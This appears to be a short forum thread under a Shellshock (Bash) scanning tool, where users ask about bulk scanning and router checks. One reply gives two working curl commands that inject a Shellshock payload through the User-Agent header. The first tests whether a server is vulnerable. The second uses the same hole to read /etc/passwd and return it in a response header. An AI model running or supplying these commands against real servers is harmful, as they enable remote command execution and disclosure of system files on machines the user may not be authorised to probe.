Any way to have it read from a list of IP's or URL's? Would take entirely too long to have to do it one at a time in an organization.

We need stuff like this for internal networks. I want to do deep checks on routers. Tips, anyone?

Easy: curl -i -X HEAD "http://[YOUR LOCAL IP]/" -A '() { :;}; echo "Warning: Server Vulnerable"'

If it shows Warning header, then you can read /etc/passwd with curl -i -X HEAD "http://[YOUR LOCAL IP]/" -A '() { :;}; echo "PASSWD-File: " $(</etc/passwd)'